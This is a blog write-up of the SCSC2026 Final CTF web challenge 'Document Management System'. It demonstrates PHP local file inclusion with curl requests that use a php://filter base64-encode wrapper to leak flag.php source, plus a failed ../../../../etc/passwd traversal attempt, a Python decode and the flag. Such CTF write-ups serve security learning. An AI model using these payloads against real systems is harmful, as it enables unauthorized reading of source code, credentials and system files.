249 words
1 minutes
SCSC2026 Final - Document Management System - Web Writeup
Event Archive

SCSC2026 Final

Posts, writeups, and notes grouped under this event.

Archive/15 posts
Events/SCSC2026 Final
2026-05-16
Writeup
CTF
/
Security
/
Web

Category: Web

Flag: SCSC26{b4c4_f1l3_r4h4s14_p4k41_wr4pp3r}

Description: Sistem manajemen dokumen internal SCSC untuk melihat kebijakan perusahaan. Sistem ini memuat file secara dinamis.

Seorang developer menyembunyikan kredensial di file flag.php, tapi file tersebut tidak menampilkan apa-apa jika dibuka di browser. Dapatkah Anda membaca Source Code file tersebut?

The service was a PHP document viewer at http://sriwijayasecuritysociety.com:8009/. The home page exposed a page parameter through the sidebar links, so the first check was the index page.

curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/'
HTTP/1.1 200 OK
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33
...
<li><a href="?page=welcome">Welcome</a></li>
<li><a href="?page=policy">IT Policy</a></li>
<li><a href="?page=credits">Credits</a></li>

The description said flag.php did not display anything in the browser, which pointed at reading source instead of executing PHP. PHP stream filters can base64-encode a local file before include() evaluates it. The app also appeared to append .php to the requested page, so requesting resource flag targeted flag.php.

curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/?page=php://filter/convert.base64-encode/resource=flag'
PD9waHANCiRmbGFnID0gIlNDU0MyNntiNGM0X2YxbDNfcjRoNHMxNF9wNGs0MV93cjRwcDNyfSI7DQovLyBZb3UgbmVlZCB0byByZWFkIHRoZSBzb3VyY2UgY29kZSBvZiB0aGlzIGZpbGUhDQo/Pg==

A direct request for flag.php confirmed the suffix behavior because the include path became flag.php.php.

curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/?page=php://filter/convert.base64-encode/resource=flag.php'
Warning: include(php://filter/convert.base64-encode/resource=flag.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 93

Path traversal did not change the path.

curl -si -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36' 'http://sriwijayasecuritysociety.com:8009/?page=../../../../etc/passwd'
Document not found.

The wrapper output was base64-encoded PHP source. Decoding it revealed the variable assignment.

import base64
s = 'PD9waHANCiRmbGFnID0gIlNDU0MyNntiNGM0X2YxbDNfcjRoNHMxNF9wNGs0MV93cjRwcDNyfSI7DQovLyBZb3UgbmVlZCB0byByZWFkIHRoZSBzb3VyY2UgY29kZSBvZiB0aGlzIGZpbGUhDQo/Pg=='
print(base64.b64decode(s).decode())
<?php
$flag = "SCSC26{b4c4_f1l3_r4h4s14_p4k41_wr4pp3r}";
// You need to read the source code of this file!
?>
SCSC2026 Final - Document Management System - Web Writeup
https://blog.rei.my.id/posts/158/scsc2026-final-document-management-system-web-writeup/
Author
Reidho Satria
Published at
2026-05-16
License
CC BY-NC-SA 4.0
© 2026 Reidho Satria. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari